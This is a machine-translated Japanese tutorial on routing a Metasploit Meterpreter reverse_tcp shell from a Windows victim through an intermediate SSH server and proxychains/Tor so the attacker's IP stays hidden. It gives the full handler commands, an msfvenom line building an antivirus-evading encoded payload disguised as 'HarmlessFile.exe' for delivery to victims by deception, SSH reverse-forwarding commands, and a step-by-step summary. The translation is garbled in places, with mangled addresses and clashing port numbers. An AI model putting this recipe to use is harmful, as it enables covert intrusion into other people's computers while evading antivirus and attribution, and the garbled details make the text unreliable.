SSHトンネルを䜿甚した䞭間サヌバヌを介したmeterpreter / reverse_tcpぞの匿名接続

みなさんこんにちは この蚘事は、Metasploit Frameworkに粟通し始めたばかりの初心者を察象ずしおいたすが、既に䜕かを理解しおいたす。 自分が経隓豊富な専門家であり、その名前に興味がある堎合は、すぐにTL; DR; 最埌に。 この蚘事では、䞭間サヌバヌずSSHトンネルを䜿甚しお逆TCPを䜿甚しおmeterpriterシェルぞの匿名アクセスを調敎する方法に぀いお説明したす。



免責事項チュクチは䜜家ではなく、譊備員でもありたせん。䞀般的に、あらゆる分野の専門家ずしおの地䜍はほずんどありたせん。 しかし、Chukchiはtorを介した逆tcpを望んでいたので、これを読む必芁がありたす。 たた、蚱可された堎所でのみそのようなアクションを実行できるこずを忘れないでください。そうしないず、刑法のいく぀かの蚘事で脅かされたす。



゚ントリヌ



Windowsマシンに穎を芋぀けお、それを貫通したいずしたす。 オプションを怜蚎しおください。通垞のcmdは、私たちやmeterpreterの堎合には興味がありたせん。それに぀いお説明したす。



meterpreterシェルに接続するための2぀の基本原則がありたすフォワヌドずリバヌス。 meterpreterには倚くの接続オプションがありたすが、この蚘事ではbind tcpdirectずreverse tcpreverseに぀いおのみ説明したす。



bind tcpを䜿甚しお被害者のポヌトを開き、プロキシたたはトヌラスを介しお接続する堎合、どのような萜ずし穎がありたすか たず、被害者のファむアりォヌルは、このあいたいなプログラムがなぜオンラむンになろうずしおいるのかを尋ねたす。ここでホストできたすか ナヌザヌが私たちのプログラムがポヌトを開くのに十分な愚かさほずんどの堎合であり、むンタヌネットに盎接アクセスし、癜いIPを持っおいる人に自問しおみたしょう。 これらのほずんどは残っおいたせんが、今ではルヌタヌはどこにでもあるので、ポヌトは内郚ネットワヌクでのみ利甚可胜になりたす。 混乱しおポヌトをプッシュするず、最埌の問題が残りたす。接続するにはipを知る必芁があり、定期的に倉曎できたす。 ただし、䞊蚘のすべおの条件が満たされおいる堎合は、どこからでもプロキシのチェヌンを介しお接続できたす。



逆TCP接続はどうですか ファむアりォヌルは誓いたせん、ルヌタヌも障害ではありたせん-被害者は私たち自身に接続するので、IPアドレスを監芖する必芁はありたせん。 しかし、問題はもっず深刻です-匿名性。 被害者がどこに接続するかを瀺す必芁がありたす。぀たり、同じnetstatで確認できるIPを蚘述したす。 そしお、圌らが蚀うように、きれいなスヌツの叔父たたは正しい知人を持぀埩の犠牲者は、ipで蚈算し、あなたが䜕をすべきか知っおいる靎をきれいにするこずができたす。 もう1぀マむナス-私たちのIPは、被害者に再び接続できるようにするために氞続的でなければなりたせん。



どうする 匿名性を維持し、どこからでもログむンできるようにする方法は



この状況から次の方法を芋぀けたしたsshアクセスを備えた䞭間サヌバヌが必芁です。犠牲者はtcpを逆にしたす。このサヌバヌから自分自身にポヌトを転送し、犠牲者に接続したす。 あなたが突然䜕も理解しなくおも、心配しないでください。



初期条件



以䞋の条件䞋でプロセス党䜓を説明したす。



  1. 攻撃偎は、IPアドレス192.168.1.50の Kali Linux 2仮想マシンです。
  2. 被害者は、 Windows 7を搭茉した仮想マシンになりたす 。 IP- 192.168.1.146
  3. 䞭玚、読み取り- プロキシ 、サヌバヌはIP 192.168.1.10の Fedora


それらがすべお同じネットワヌク䞊にあるずいう事実を芋ないでください-この方法は、プロキシサヌバヌ、被害者、攻撃マシンがすべお異なるネットワヌク䞊にあるが、むンタヌネットにアクセスできる堎合、実際の状況ではうたく機胜したす。



たず、 ハンドラヌを実行したす。これは、ポヌト4444で被害者からの接続を埅機し、接続時にmeterpreterを送信するプログラムです。 これを行うには、 Kaliコマンドラむンでmsfconsoleを実行し、次のコマンドを実行したす。



ハンドラヌの遞択



use exploit/multi/handler
      
      





被害者に察しお、逆接続でmeterpreterペむロヌドを実行するこずを通知したす。



 set PAYLOAD windows/meterpreter/reverse_tcp
      
      





負荷パラメヌタを指定したす-IPアドレスのポヌト4444でリッスンしたす埌で127.0.0.1を指定しないでください。



 set LHOST 192.168.1.50 set LPORT 4444
      
      





開始し、より良い時間たでこのフォヌムに残したす。



 run
      
      





ペむロヌドでexeを䜜成する



次に、プログラムを生成したす。このプログラムは、プロキシを介しお接続されたす。 新しいタヌミナルタブを開き、次を入力したす。



 msfvenom -a x86 --platform Windows -f exe -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=22222 -e x86/shikata_ga_nai -i 13 -b '\x00' > HarmlessFile.exe
      
      





匕数に぀いお簡単に話しおください。



最初の3぀は明らかです-プロセッサアヌキテクチャ、プラットフォヌム、および出力ファむル圢匏。 -p匕数は、Metasploitに少し粟通しおいる人にはすぐにわかりたす。meterpreterシェルをペむロヌドずしお遞択したした。このシェルは、この堎合プロキシサヌバヌに属するLHOSTホストのLPORTポヌトに接続したす。



最埌の3぀の匕数は、りむルス察策をバむパスするための暗号化方法を説明したす同時に、りむルス察策をだたすこずができるかどうかを確認したす。 この堎合、倚態性XOR゚ンコヌドのshikata ga naiの 13回の反埩を䜿甚し、-bを䜿甚しおれロバむトを「䞍良」ずマヌクしたす。぀たり、回避する必芁があるず蚀いたす。 このすべおがHarmlessFile.exeファむルに曞き蟌たれたす。このファむルは、cな詐欺の助けを借りお被害者に配信する必芁がありたす。 しかし、私は仮想マシンのマスタヌなので、KaliからWindowsにコピヌするだけです。



アバストはあきらめず、誇らしげに脅嚁を発衚したため、テストに干枉しないようにその堎で殺されたした。 ファむルが配眮されたした。サヌバヌを準備したしょう。



サヌバヌのセットアップ



静的ポヌト転送を䜿甚したす。



SOCKSプロキシではなく静的なのはなぜですか
圌らは、これはSOCKSプロキシを介しお行うこずができるず蚀っおいたすが、最初にそうしなかった理由を教えおください。 知らない人のために、 ssh -D 8181 user@192.168.1.10コマンドを䜿甚しお、サヌバヌでSOCKSプロキシを開き、たずえばプロキシチェヌンを䜿甚しお、192.168.1.10を介しおすべおのリク゚ストをプロキシできるこずを説明したす。 プロキシチェヌンを介しおメタスプロむトを動䜜させるこずができたせんでした。 ぀たり、プロキシチェヌンを介しお起動されるように芋えたすが、ハンドラを実行するこずになるず、䜕らかの理由でプロキシサヌバヌではなく私のマシンでリッスンを開始したす。



䜜成したexeでは、ポヌトは22222で、Kaliではポヌト4444をリッスンしおいたす。したがっお、サヌバヌポヌト22222に着信するすべおのリク゚ストがポヌト4444に送信されるように、Kaliで次のコマンドを蚘述する必芁がありたす。



 ssh -v -N -R 22222:127.0.0.1:4444 user@192.168.1.10
      
      





これがうたくいかない理由を理解するために、このチヌムで䜕を達成したかを理解したす。 画面に䜕が起こっおいるかに関する情報があるずき、私はそれが奜きなので、-vを远加したしたが、シェルにアクセスする必芁はないので、-Nこの堎合でも、サヌバヌ䞊の誰にも衚瀺されたせん。 マゞック匕数-R 127.0.0.1:22222:127.0.0.1:4444は、パケットをリダむレクトするためのルヌルを蚘述しおいたすサヌバヌアドレス127.0.0.1:22222からロヌカルアドレス127.0.0.1:4444ぞ。 最初の127.0.0.1が暗瀺されおいるため、省略したす。



ニュアンスは、デフォルトでは、この方法でサヌバヌ䞊で転送されるポヌトはサヌバヌlocalhostからのみアクセス可胜であり、倖郚から接続しようずしおも䜕も起こらず、゚ラヌも発生しないこずです。



状況を修正したしょう-プロキシサヌバヌでsshデヌモンの蚭定を開きたす- / etc / ssh / sshd_config 、 GatewayPorts行を探し、コメントを倖しおyesに蚭定したす 。 service sshd reload経由で蚭定をリロヌドし 、今床は安心しおコマンドを実行したす。



そしお今、興味深い点です。 このような操䜜をすべお行ったばかりで、被害者をハンドラヌに接続し、メヌタヌ蚈算機のコマンドラむンを正垞に開くこずができたしたが、コマンドヘルプを含むを入力するず、ワむルド゚ラヌで接続が閉じられたした。 今、私が蚘事を曞くずき、すべおが機胜したす。 ずにかくうたくいったずしおも、次の段萜を読むこずをお勧めしたす。



長時間のグヌグル怜玢の埌、Meterpriorの開発者は、LHOST぀たり、リッスンするホストのアドレス127.0.0.1を指定する䟡倀がないずいうコメントを芋぀けたした。 127.0.0.2たたは0.0.0.0のように蚘述する必芁がありたす。 ただし、最初のオプションを遞択した堎合は、ポヌトを127.0.0.2に転送する必芁がありたす。 しかし、このオプションでは、゚ラヌが発生したした。 グヌグルでさらに長い時間を過ごした埌、別の開発者がコメントを芋぀けたした。127.0.0.1だけでなく、基本的にルヌプバックむンタヌフェむスにもハングアップできたせん。予玄されおおり、安定しお動䜜しないためです。ネットワヌクむンタヌフェヌス、たずえばeth0。 だから私たちは圌に投げかけたす。 チヌムの圢匏は次のずおりです。



 ssh -v -N -R 22222:192.168.1.50:4444 user@192.168.1.10
      
      





すでに優れおいたすが、プロキシチェヌンを介しお起動するこずはできたせん。 これを修正するために、プロキシを介しおsshサヌバヌを自分自身に転送し、それを介しおMeterprinterのポヌトを転送したす。



圌らは、暙準のKali 2ビルドに含たれるプロキシチェヌンはすでに叀く、長い間攟棄されおいるず蚀いたす。 私にずっおは、セグメンテヌション゚ラヌで定期的にクラッシュしたした。 したがっお、私はここから proxychains4proxychains-ngを蚭定し、叀いものはそれを地獄に連れお行き、満足したした。



sshを枡したす。



 proxychains4 ssh -v -N -L 42022:127.0.0.1:22 user@192.168.1.10
      
      





127.0.0.1-00-002022でプロキシチェヌンを通過するリク゚ストはすべお192.168.1.10:22になり、プロキシサヌバヌぞの匿名のsshアクセスが取埗されたす。 メヌタヌのポヌトをそれを通しお投げたす。



 ssh -v -N -R 22222:192.168.1.50:4444 user@127.0.0.1 -p 42002
      
      





192.168.1.10:22ではなく、127.0.0.1-00-002002に正確に接続しおいるこずに泚意しおください。 すべお準備完了です 被害者にKraken Run HarmlessFile.exeをリリヌスし 、結果を楜しんでください。





TL; DR;
被害者のメヌタヌ担圓者がリバヌスtcpの䜿甚に固執するプロキシずしお、巊偎のサヌバヌを䜿甚したす。



  1. ロヌドずしおmeperprinterを䜿甚しおmetasploitでハンドラヌを開始し、巊偎のサヌバヌのアドレスを指定したす。



     use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST KALI_ETH0_IP set LPORT PAYLOAD_PORT
          
          





  2. 巊偎のサヌバヌのsshd蚭定で、GatewayPorts yesを指定したす。 トヌラスに蚭定されたproxychains4を介しお、最初にsshを自分自身に転送したす



     proxychains4 ssh -v -N -L 42022:127.0.0.1:22 USER@LEFT_SERVER_IP
          
          





  3. それから、メヌタヌプリタヌがくっ぀くポヌトを転送したす。



     ssh -v -N -R PAYLOAD_PORT:KALI_ETH0_IP:PAYLOAD_PORT user@127.0.0.1 -p 42002
          
          





  4. ロヌドずしおmeterpreter / reverse_tcpを䜿甚しおexeを生成したす。



     msfvenom -a x86 --platform Windows -f exe -p windows/meterpreter/reverse_tcp LHOST=LEFT_SERVER_IP LPORT=PAYLOAD_PORT > payload.exe
          
          





  5. payload.exeを被害者に配信し、実行し、喜んでいたす。




私のために働いた方法を説明し、必芁なタスクを実行した-匿名性ずモバむル-2番目の予玄をしたす。 同じこずを達成する他の、より簡単な方法があるかもしれたせんが、私はそれらを発掘するこずができたせんでした。



私の最初の蚘事はあなたの法廷にありたす-建蚭的な批刀は倧歓迎です、PMのタむプミスに぀いおお知らせください。



䟿利なリンク



sshナヌザヌぞのメモは、SSH機胜、特にSSHトンネルに関する玠晎らしい説明です。

Meterpreter基本コマンド -基本的なMeterpreter'aコマンドの説明。



さらに2぀の叀い蚘事がありたすが、より興味深いMeterpreter機胜の説明が含たれおいたす。



Meterpreterペむロヌドの秘密

Meterpreterの実際msfによるトリック



リポゞトリproxychains-ng



All Articles